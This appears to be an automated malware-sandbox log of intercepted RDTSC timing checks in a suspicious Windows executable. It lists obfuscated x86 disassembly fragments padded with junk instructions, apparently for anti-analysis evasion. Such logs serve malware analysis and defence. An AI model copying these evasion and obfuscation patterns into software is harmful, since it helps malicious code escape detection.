Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050831 second address: 705085F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+32h], ax 0x0000000f pushad 0x00000010 pushad 0x00000011 mov si, 2201h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 mov bx, ax 0x0000001b popad 0x0000001c mov eax, dword ptr [ebx+0000008Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705085F second address: 7050863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050863 second address: 7050869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050869 second address: 70508EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, A6CFh 0x00000007 mov cl, E0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+34h], eax 0x0000000f pushad 0x00000010 call 00007F5FC0E77A0Dh 0x00000015 movzx esi, dx 0x00000018 pop ebx 0x00000019 pushfd 0x0000001a jmp 00007F5FC0E77A0Ah 0x0000001f xor eax, 5F8ED0A8h 0x00000025 jmp 00007F5FC0E77A0Bh 0x0000002a popfd 0x0000002b popad 0x0000002c mov eax, dword ptr [ebx+18h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 call 00007F5FC0E77A0Bh 0x00000037 pop eax 0x00000038 pushfd 0x00000039 jmp 00007F5FC0E77A19h 0x0000003e adc cl, 00000076h 0x00000041 jmp 00007F5FC0E77A11h 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70508EA second address: 7050955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c pushad 0x0000000d mov esi, 04B785F3h 0x00000012 pushfd 0x00000013 jmp 00007F5FC0CE52D8h 0x00000018 and ecx, 15C8A2F8h 0x0000001e jmp 00007F5FC0CE52CBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr [ebx+1Ch] 0x00000028 jmp 00007F5FC0CE52D6h 0x0000002d mov dword ptr [esi+3Ch], eax 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050955 second address: 7050959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050959 second address: 70509BE instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b pushad 0x0000000c pushad 0x0000000d mov dx, 44A0h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push edx 0x00000015 pop ebx 0x00000016 popad 0x00000017 mov dword ptr [esi+40h], eax 0x0000001a pushad 0x0000001b mov eax, 4B5CD9C9h 0x00000020 pushfd 0x00000021 jmp 00007F5FC0CE52D6h 0x00000026 adc al, 00000018h 0x00000029 jmp 00007F5FC0CE52CBh 0x0000002e popfd 0x0000002f popad 0x00000030 lea eax, dword ptr [ebx+00000080h] 0x00000036 pushad 0x00000037 mov eax, 04749FEBh 0x0000003c call 00007F5FC0CE52D0h 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70509BE second address: 7050A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push 00000001h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5FC0E77A18h 0x00000011 and ch, FFFFFFD8h 0x00000014 jmp 00007F5FC0E77A0Bh 0x00000019 popfd 0x0000001a jmp 00007F5FC0E77A18h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050A0A second address: 7050A7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F5FC0CE52CDh 0x0000000b and ecx, 4F68C926h 0x00000011 jmp 00007F5FC0CE52D1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b jmp 00007F5FC0CE52CEh 0x00000020 push eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F5FC0CE52D1h 0x00000028 and cl, 00000036h 0x0000002b jmp 00007F5FC0CE52D1h 0x00000030 popfd 0x00000031 popad 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 mov ebx, 3B3C9058h 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050A7D second address: 7050AAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, BCh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lea eax, dword ptr [ebp-10h] 0x0000000d pushad 0x0000000e movsx ebx, ax 0x00000011 mov bx, cx 0x00000014 popad 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5FC0E77A15h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050AAA second address: 7050ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov di, 4C7Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F5FC0CE52D4h 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5FC0CE52CAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050ADB second address: 7050AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050BAF second address: 7050BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050BB3 second address: 7050BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050BB9 second address: 7050BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050BD0 second address: 7050BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050BD4 second address: 7050C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F602F5C3DADh 0x0000000e jmp 00007F5FC0CE52D5h 0x00000013 mov eax, dword ptr [ebp-0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5FC0CE52CDh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050C09 second address: 7050C27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050C27 second address: 7050C2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050C2D second address: 7050C7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 mov eax, 47274B43h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d lea eax, dword ptr [ebx+78h] 0x00000010 jmp 00007F5FC0E77A16h 0x00000015 push 00000001h 0x00000017 jmp 00007F5FC0E77A10h 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007F5FC0E77A0Dh 0x00000025 pop ecx 0x00000026 mov bh, 79h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050C7A second address: 7050CBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5FC0CE52D9h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5FC0CE52CDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050CBB second address: 7050CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050CC1 second address: 7050CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050CC5 second address: 7050D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-08h] 0x0000000b jmp 00007F5FC0E77A0Fh 0x00000010 nop 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F5FC0E77A12h 0x00000018 pushfd 0x00000019 jmp 00007F5FC0E77A12h 0x0000001e or eax, 74CE47E8h 0x00000024 jmp 00007F5FC0E77A0Bh 0x00000029 popfd 0x0000002a popad 0x0000002b pushad 0x0000002c call 00007F5FC0E77A16h 0x00000031 pop eax 0x00000032 pushfd 0x00000033 jmp 00007F5FC0E77A0Bh 0x00000038 and ecx, 5598B7DEh 0x0000003e jmp 00007F5FC0E77A19h 0x00000043 popfd 0x00000044 popad 0x00000045 popad 0x00000046 push eax 0x00000047 pushad 0x00000048 mov bl, 13h 0x0000004a mov di, si 0x0000004d popad 0x0000004e nop 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F5FC0E77A10h 0x00000056 sbb eax, 47290F08h 0x0000005c jmp 00007F5FC0E77A0Bh 0x00000061 popfd 0x00000062 push eax 0x00000063 push edx 0x00000064 movzx eax, dx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050D92 second address: 7050D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050DAF second address: 7050DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0E77A0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050DC1 second address: 7050DE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ah, dh 0x00000012 call 00007F5FC0CE52CCh 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050DE7 second address: 7050E02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0E77A17h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050E02 second address: 7050ECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a jmp 00007F5FC0CE52D5h 0x0000000f js 00007F602F5C3B5Eh 0x00000015 jmp 00007F5FC0CE52CEh 0x0000001a mov eax, dword ptr [ebp-04h] 0x0000001d pushad 0x0000001e movzx ecx, di 0x00000021 pushfd 0x00000022 jmp 00007F5FC0CE52D3h 0x00000027 and ecx, 48C80D7Eh 0x0000002d jmp 00007F5FC0CE52D9h 0x00000032 popfd 0x00000033 popad 0x00000034 mov dword ptr [esi+08h], eax 0x00000037 jmp 00007F5FC0CE52CEh 0x0000003c lea eax, dword ptr [ebx+70h] 0x0000003f jmp 00007F5FC0CE52D0h 0x00000044 push 00000001h 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F5FC0CE52CEh 0x0000004d add ecx, 0C8F92D8h 0x00000053 jmp 00007F5FC0CE52CBh 0x00000058 popfd 0x00000059 push eax 0x0000005a push edi 0x0000005b pop esi 0x0000005c pop ebx 0x0000005d popad 0x0000005e nop 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F5FC0CE52CDh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050ECE second address: 7050F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dx, 3DB2h 0x0000000f pushfd 0x00000010 jmp 00007F5FC0E77A13h 0x00000015 add ah, FFFFFFAEh 0x00000018 jmp 00007F5FC0E77A19h 0x0000001d popfd 0x0000001e popad 0x0000001f nop 0x00000020 jmp 00007F5FC0E77A0Eh 0x00000025 lea eax, dword ptr [ebp-18h] 0x00000028 jmp 00007F5FC0E77A10h 0x0000002d nop 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F5FC0E77A0Eh 0x00000035 and ecx, 33320B88h 0x0000003b jmp 00007F5FC0E77A0Bh 0x00000040 popfd 0x00000041 jmp 00007F5FC0E77A18h 0x00000046 popad 0x00000047 push eax 0x00000048 jmp 00007F5FC0E77A0Bh 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F5FC0E77A15h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050F9D second address: 7050FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050FA3 second address: 7050FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050FA7 second address: 7050FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70510DC second address: 70510F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70510F1 second address: 7051101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7051101 second address: 7051163 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F5FC0E77A10h 0x00000016 or cl, 00000008h 0x00000019 jmp 00007F5FC0E77A0Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F5FC0E77A18h 0x00000025 sub eax, 555E2A68h 0x0000002b jmp 00007F5FC0E77A0Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7051163 second address: 7051169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7051169 second address: 705116D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705116D second address: 70511AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock cmpxchg dword ptr [edx], ecx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5FC0CE52CDh 0x00000013 sbb si, 1486h 0x00000018 jmp 00007F5FC0CE52D1h 0x0000001d popfd 0x0000001e push eax 0x0000001f mov dl, 44h 0x00000021 pop esi 0x00000022 popad 0x00000023 pop edi 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov edx, esi 0x00000029 movzx eax, bx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70511AE second address: 705124D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5FC0E77A14h 0x00000008 pushfd 0x00000009 jmp 00007F5FC0E77A12h 0x0000000e add esi, 67098CB8h 0x00000014 jmp 00007F5FC0E77A0Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test eax, eax 0x0000001f jmp 00007F5FC0E77A16h 0x00000024 jne 00007F602F755EDDh 0x0000002a pushad 0x0000002b call 00007F5FC0E77A0Eh 0x00000030 mov cx, 6CE1h 0x00000034 pop eax 0x00000035 call 00007F5FC0E77A17h 0x0000003a mov edi, esi 0x0000003c pop eax 0x0000003d popad 0x0000003e mov edx, dword ptr [ebp+08h] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F5FC0E77A0Eh 0x00000048 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705124D second address: 705128F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b jmp 00007F5FC0CE52D6h 0x00000010 mov dword ptr [edx], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5FC0CE52D7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705128F second address: 70512D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c pushad 0x0000000d push esi 0x0000000e movsx edi, cx 0x00000011 pop ecx 0x00000012 mov edi, 5FC93AF8h 0x00000017 popad 0x00000018 mov dword ptr [edx+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e call 00007F5FC0E77A0Fh 0x00000023 pop eax 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70512D2 second address: 705132C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+08h] 0x0000000c pushad 0x0000000d mov esi, 33F2EB5Dh 0x00000012 mov bx, si 0x00000015 popad 0x00000016 mov dword ptr [edx+08h], eax 0x00000019 jmp 00007F5FC0CE52D4h 0x0000001e mov eax, dword ptr [esi+0Ch] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F5FC0CE52D7h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705132C second address: 705139D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5FC0E77A0Fh 0x00000009 adc cx, CEDEh 0x0000000e jmp 00007F5FC0E77A19h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [edx+0Ch], eax 0x0000001a pushad 0x0000001b mov bx, 143Eh 0x0000001f mov ebx, 7897364Ah 0x00000024 popad 0x00000025 mov eax, dword ptr [esi+10h] 0x00000028 jmp 00007F5FC0E77A11h 0x0000002d mov dword ptr [edx+10h], eax 0x00000030 jmp 00007F5FC0E77A0Eh 0x00000035 mov eax, dword ptr [esi+14h] 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705139D second address: 70513A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70513A3 second address: 70513C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov eax, 7B925CF3h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70513C6 second address: 70513FE instructions: 0x00000000 rdtsc 0x00000002 call 00007F5FC0CE52D8h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dx, 4136h 0x0000000e popad 0x0000000f mov eax, dword ptr [esi+18h] 0x00000012 pushad 0x00000013 movsx ebx, ax 0x00000016 mov ecx, 55B0074Bh 0x0000001b popad 0x0000001c mov dword ptr [edx+18h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ecx, ebx 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70513FE second address: 7051489 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5FC0E77A11h 0x00000009 sbb ax, CD46h 0x0000000e jmp 00007F5FC0E77A11h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [esi+1Ch] 0x0000001c pushad 0x0000001d mov ch, 1Ah 0x0000001f mov dl, 39h 0x00000021 popad 0x00000022 mov dword ptr [edx+1Ch], eax 0x00000025 jmp 00007F5FC0E77A0Ch 0x0000002a mov eax, dword ptr [esi+20h] 0x0000002d jmp 00007F5FC0E77A10h 0x00000032 mov dword ptr [edx+20h], eax 0x00000035 jmp 00007F5FC0E77A10h 0x0000003a mov eax, dword ptr [esi+24h] 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F5FC0E77A17h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7051489 second address: 70514A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70514A1 second address: 70514A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70514A5 second address: 70514FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b jmp 00007F5FC0CE52D7h 0x00000010 mov eax, dword ptr [esi+28h] 0x00000013 pushad 0x00000014 mov di, si 0x00000017 pushfd 0x00000018 jmp 00007F5FC0CE52D0h 0x0000001d sub ax, B698h 0x00000022 jmp 00007F5FC0CE52CBh 0x00000027 popfd 0x00000028 popad 0x00000029 mov dword ptr [edx+28h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70514FA second address: 7051500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7051500 second address: 70515E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c jmp 00007F5FC0CE52D0h 0x00000011 mov dword ptr [edx+2Ch], ecx 0x00000014 jmp 00007F5FC0CE52D0h 0x00000019 mov ax, word ptr [esi+30h] 0x0000001d pushad 0x0000001e pushad 0x0000001f movzx eax, di 0x00000022 pushfd 0x00000023 jmp 00007F5FC0CE52D9h 0x00000028 or si, DEF6h 0x0000002d jmp 00007F5FC0CE52D1h 0x00000032 popfd 0x00000033 popad 0x00000034 mov dx, cx 0x00000037 popad 0x00000038 mov word ptr [edx+30h], ax 0x0000003c jmp 00007F5FC0CE52CAh 0x00000041 mov ax, word ptr [esi+32h] 0x00000045 jmp 00007F5FC0CE52D0h 0x0000004a mov word ptr [edx+32h], ax 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007F5FC0CE52CEh 0x00000055 or ecx, 1E4AEA78h 0x0000005b jmp 00007F5FC0CE52CBh 0x00000060 popfd 0x00000061 jmp 00007F5FC0CE52D8h 0x00000066 popad 0x00000067 mov eax, dword ptr [esi+34h] 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F5FC0CE52CAh 0x00000073 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70515E5 second address: 70515F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70515F4 second address: 70515FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70515FA second address: 70515FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70515FE second address: 7051630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+34h], eax 0x0000000b jmp 00007F5FC0CE52D7h 0x00000010 test ecx, 00000700h 0x00000016 pushad 0x00000017 push ecx 0x00000018 movsx edx, si 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e mov eax, edx 0x00000020 rdtsc
